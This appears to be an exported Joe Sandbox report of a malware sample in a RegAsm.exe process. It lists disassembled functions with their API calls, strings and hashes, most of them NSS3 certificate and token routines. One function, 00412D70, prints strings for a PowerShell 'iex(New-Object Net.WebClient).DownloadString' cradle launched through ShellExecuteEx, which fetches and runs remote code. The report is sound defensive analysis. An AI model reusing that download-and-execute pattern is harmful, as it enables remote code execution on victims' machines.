Opcode Fuzzy Hash: dc857cbed8683a81613aaa86d5e4ba8bbc02aa2356dc8a8facf47b19c35d4da3
Instruction Fuzzy Hash: 5361C3B1E062658BDF10CF64C9407EEB7B2AF45308F2C4169D815EBB50E7399D89CB90

Function 6CA49C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6CA48850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CA50715), ref: 6CA48859
Part of subcall function 6CA48850: PR_NewLock.NSS3 ref: 6CA48874
Part of subcall function 6CA48850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CA4888D

PR_NewLock.NSS3 ref: 6CA49CAD

Part of subcall function 6CAF98D0: calloc.MOZGLUE(00000001,00000084,6CA20936,00000001,?,6CA2102C), ref: 6CAF98E5

Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207AD
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207CD
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207D6
Part of subcall function 6CA207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9B204A), ref: 6CA207E4
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,6C9B204A), ref: 6CA20864
Part of subcall function 6CA207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA20880
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,6C9B204A), ref: 6CA208CB
Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(?,?,6C9B204A), ref: 6CA208D7
Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(?,?,6C9B204A), ref: 6CA208FB

TlsGetValue.KERNEL32 ref: 6CA49CE8
EnterCriticalSection.KERNEL32(?,?,6CA4ECEC,6CA52FCD,00000000,?,6CA52FCD,?), ref: 6CA49D01
TlsGetValue.KERNEL32(?,?,?,6CA4ECEC,6CA52FCD,00000000,?,6CA52FCD,?), ref: 6CA49D38
EnterCriticalSection.KERNEL32(?,?,6CA4ECEC,6CA52FCD,00000000,?,6CA52FCD,?), ref: 6CA49D4D
PR_Unlock.NSS3 ref: 6CA49D70
PR_Unlock.NSS3 ref: 6CA49DC3
PR_NewLock.NSS3 ref: 6CA49DDD

Part of subcall function 6CA488D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA50725,00000000,00000058), ref: 6CA48906
Part of subcall function 6CA488D0: EnterCriticalSection.KERNEL32(?), ref: 6CA4891A
Part of subcall function 6CA488D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CA4894A
Part of subcall function 6CA488D0: calloc.MOZGLUE(00000001,6CA5072D,00000000,00000000,00000000,?,6CA50725,00000000,00000058), ref: 6CA48959
Part of subcall function 6CA488D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CA48993
Part of subcall function 6CA488D0: PR_Unlock.NSS3(?), ref: 6CA489AF

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: 815b890870b0001fcc3e0cfc2fb43f8cbb194f260fc771826f4bb69d9c9238c2
Instruction ID: 488dbe38f5c9dfcacaed6ee47024c290b8ce1bb798eb80143e14675a0543a10b
Opcode Fuzzy Hash: 815b890870b0001fcc3e0cfc2fb43f8cbb194f260fc771826f4bb69d9c9238c2
Instruction Fuzzy Hash: E2514DB0A056059FDB00EF78C3846AABBF8BF45349F15C529D8989BB15E730E8D4CB91

Function 6CB49EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CB49EC0
EnterCriticalSection.KERNEL32(?), ref: 6CB49EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6CB49F73
EnterCriticalSection.KERNEL32(?), ref: 6CB49FA5
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6CB49FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6CB49FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6CB4A01D

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: eac48ebda1d6b8c2953b1ea79d2fe86ef8427fb0e4977b0a2e0e39f7bd0cfdf3
Instruction ID: 5894c20e80b617693208cd9aefce80d68145705b00870b7c567db2f014fc67be
Opcode Fuzzy Hash: eac48ebda1d6b8c2953b1ea79d2fe86ef8427fb0e4977b0a2e0e39f7bd0cfdf3
Instruction Fuzzy Hash: 0D51D4B2804600CBCB10DF25D68468AB7F4FF09319F15866AE86957B16E731F889CFD2

Function 6CA3DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CA3DCFA

Part of subcall function 6CAF9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB40A27), ref: 6CAF9DC6
Part of subcall function 6CAF9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB40A27), ref: 6CAF9DD1
Part of subcall function 6CAF9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAF9DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA3DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CA3DD62
CERT_DestroyCertificate.NSS3(?), ref: 6CA3DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6CA3DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6CA3DD8F

Part of subcall function 6CA506A0: TlsGetValue.KERNEL32 ref: 6CA506C2
Part of subcall function 6CA506A0: EnterCriticalSection.KERNEL32(?), ref: 6CA506D6
Part of subcall function 6CA506A0: PR_Unlock.NSS3 ref: 6CA506EB

CERT_DestroyCertificate.NSS3(?), ref: 6CA3DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6CA3DDB7

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: f0a7572d2e4c4437641a2a7f069f40d0a0e8af7687e8debb9f52ea584f94f7b7
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 6721BFB6E021359BDF029EA4DD509DEB7B4AF05258B181024EC1CE7711F731EA98CBE2

Function 6CA33C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6CAA460B,?,?), ref: 6CA33CA9
EnterCriticalSection.KERNEL32(?), ref: 6CA33CB9
PL_HashTableLookup.NSS3(?), ref: 6CA33CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6CA33CD6
PR_Unlock.NSS3 ref: 6CA33CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CA33CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA33D03
PR_Unlock.NSS3 ref: 6CA33D15

Part of subcall function 6CADDD70: TlsGetValue.KERNEL32 ref: 6CADDD8C
Part of subcall function 6CADDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CADDDB4

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 20a8429a979b05ba193ad09ac629c13ecae36dce08d2739d153c5a205d8a777a
Instruction ID: 65402b7fe7e4545d17293f74876233eed2e7ce2c9e822f20e7cdc85d1e1559d0
Opcode Fuzzy Hash: 20a8429a979b05ba193ad09ac629c13ecae36dce08d2739d153c5a205d8a777a
Instruction Fuzzy Hash: BF110AB6E46515ABDB011A24AD058E67A3CEB0325CB194630ED5CD3611F721D8DDC6D1

Function 6CA39C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA511C0: PR_NewLock.NSS3 ref: 6CA51216

free.MOZGLUE(?), ref: 6CA39E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA39E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA39E4E
TlsGetValue.KERNEL32 ref: 6CA39EA2

Part of subcall function 6CA49500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CA49546

EnterCriticalSection.KERNEL32(?), ref: 6CA39EB6
PR_Unlock.NSS3 ref: 6CA39ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CA39F18

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 05b16e9445c06992c3b7e9ba8c355150aa54fdd4262c7a4f35ccb1c9b86a4c9e
Instruction ID: 6f6e6ad9f6a9a150efb39c64dc5e49435c57423139f5b3a56b52062ae7e0c848
Opcode Fuzzy Hash: 05b16e9445c06992c3b7e9ba8c355150aa54fdd4262c7a4f35ccb1c9b86a4c9e
Instruction Fuzzy Hash: 5E8116B5A00311ABE7009F34DE41AABB7B9BF4524CF185529E849C7B41FF31E898C792

Function 6CA4DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA4AB10: DeleteCriticalSection.KERNEL32(D958E852,6CA51397,5B5F5EC0,?,?,6CA4B1EE,2404110F,?,?), ref: 6CA4AB3C
Part of subcall function 6CA4AB10: free.MOZGLUE(D958E836,?,6CA4B1EE,2404110F,?,?), ref: 6CA4AB49
Part of subcall function 6CA4AB10: DeleteCriticalSection.KERNEL32(5D5E6CC4), ref: 6CA4AB5C
Part of subcall function 6CA4AB10: free.MOZGLUE(5D5E6CB8), ref: 6CA4AB63
Part of subcall function 6CA4AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CA4AB6F
Part of subcall function 6CA4AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CA4AB76

TlsGetValue.KERNEL32 ref: 6CA4DCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6CA4DD0E
PK11_IsFriendly.NSS3(?), ref: 6CA4DD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CA4DD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA4DE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA4DEA6
PR_Unlock.NSS3(?), ref: 6CA4DF08

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: 9ef69dcb4ad76145a90c777f67f0a41d46be0c6ee70948038b97afe42083bab5
Instruction ID: a0b73a7ce1b56a4e7c48aef5af82911fba15f3d38851b76001344636042cb8b4
Opcode Fuzzy Hash: 9ef69dcb4ad76145a90c777f67f0a41d46be0c6ee70948038b97afe42083bab5
Instruction Fuzzy Hash: 5391C3B5E011059FEB00CF68D981BAAB7B5BF54308F28C029DD199BB41E731E999CB91

Function 6CA22D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CA22D69

Strings

winTruncate1, xrefs: 6CA22EBE
winTruncate2, xrefs: 6CA22EF8
winUnmapfile2, xrefs: 6CA22F7F
winUnmapfile1, xrefs: 6CA22F55
winSeekFile, xrefs: 6CA22E9C

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 73c0aa9156fbb38f61d19588296bec92eb9705f9ae3ca7e798e496fc271d72d4
Instruction ID: 6e2593ea27c48c89c6af421fc09cbc101b646c76b9d4864c6fd13fe87cd88b5f
Opcode Fuzzy Hash: 73c0aa9156fbb38f61d19588296bec92eb9705f9ae3ca7e798e496fc271d72d4
Instruction Fuzzy Hash: 6F61C375B002149FDB14CF64DC94A6E7BB1FF4A324F188228E915AB780DB35ED56CB90

Function 6CA5DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA5DF37
EnterCriticalSection.KERNEL32(?), ref: 6CA5DF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA5DF96
PR_SetError.NSS3(00000000,00000000), ref: 6CA5E02B
PR_Unlock.NSS3(?), ref: 6CA5E07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA5E090
PR_Unlock.NSS3(?), ref: 6CA5E0AF

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: 1ca769f5b1d06c8aa88bb528acc9ee1253845b75816b5746612a230691cdad76
Instruction ID: 048c40ce50af689c27bde7a84b6f00870847f6c0a8af48aca79ec840cba91980
Opcode Fuzzy Hash: 1ca769f5b1d06c8aa88bb528acc9ee1253845b75816b5746612a230691cdad76
Instruction Fuzzy Hash: D051D131A40600DFDB209F24DD44B5673B5FF45318F948528E85687F91D736E9E8CB92

Function 6CA5BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CA5BD1E

Part of subcall function 6CA32F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA32F0A
Part of subcall function 6CA32F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA32F1D

Part of subcall function 6CA757D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA3B41E,00000000,00000000,?,00000000,?,6CA3B41E,00000000,00000000,00000001,?), ref: 6CA757E0
Part of subcall function 6CA757D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CA75843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA5BD8C

Part of subcall function 6CA8FAB0: free.MOZGLUE(?,-00000001,?,?,6CA2F673,00000000,00000000), ref: 6CA8FAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6CA5BD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CA5BDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA5BE3A

Part of subcall function 6CA33E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA33EC2
Part of subcall function 6CA33E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA33ED6
Part of subcall function 6CA33E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA33EEE
Part of subcall function 6CA33E60: PR_CallOnce.NSS3(6CB92AA4,6CA912D0), ref: 6CA33F02
Part of subcall function 6CA33E60: PL_FreeArenaPool.NSS3 ref: 6CA33F14
Part of subcall function 6CA33E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA33F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA5BE52

Part of subcall function 6CA32E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA32CDA,?,00000000), ref: 6CA32E1E
Part of subcall function 6CA32E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA32E33
Part of subcall function 6CA32E00: TlsGetValue.KERNEL32 ref: 6CA32E4E
Part of subcall function 6CA32E00: EnterCriticalSection.KERNEL32(?), ref: 6CA32E5E
Part of subcall function 6CA32E00: PL_HashTableLookup.NSS3(?), ref: 6CA32E71
Part of subcall function 6CA32E00: PL_HashTableRemove.NSS3(?), ref: 6CA32E84
Part of subcall function 6CA32E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA32E96
Part of subcall function 6CA32E00: PR_Unlock.NSS3 ref: 6CA32EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA5BE61

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: 9b6ba9ab3718326c8804d861a1814edc376867aa55d4a450e06e96c0067a3743
Instruction ID: 9f448ea09f58cc3c22885764a95fc23d8615e130e6adbc661ccf2bddccef189f
Opcode Fuzzy Hash: 9b6ba9ab3718326c8804d861a1814edc376867aa55d4a450e06e96c0067a3743
Instruction Fuzzy Hash: A74105B6A012109FC710CF24ED80A6AB7F4EB45719F548258FD0897711E731E8A8CB92

Function 00412D70 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412EC0

Strings

')", xrefs: 00412E13
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412E18
.ps1, xrefs: 00412DF3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412E5B
C:\ProgramData\, xrefs: 00412DA3

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-1989157005
Opcode ID: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
Instruction ID: d4bc49303887be4e6334ac6b4843b1e71d055e880c24203978c9a7e3e1ca0007
Opcode Fuzzy Hash: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
Instruction Fuzzy Hash: 4641FB71E00119ABCF11FBA6DD469CDB7B4AF04308F61406BF514B7191DBB86E8A8B98

Function 6CA7AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CA7AB3E,?,?,?), ref: 6CA7AC35

Part of subcall function 6CA5CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CA5CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CA7AB3E,?,?,?), ref: 6CA7AC55

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CA7AB3E,?,?), ref: 6CA7AC70

Part of subcall function 6CA5E300: TlsGetValue.KERNEL32 ref: 6CA5E33C
Part of subcall function 6CA5E300: EnterCriticalSection.KERNEL32(?), ref: 6CA5E350
Part of subcall function 6CA5E300: PR_Unlock.NSS3(?), ref: 6CA5E5BC
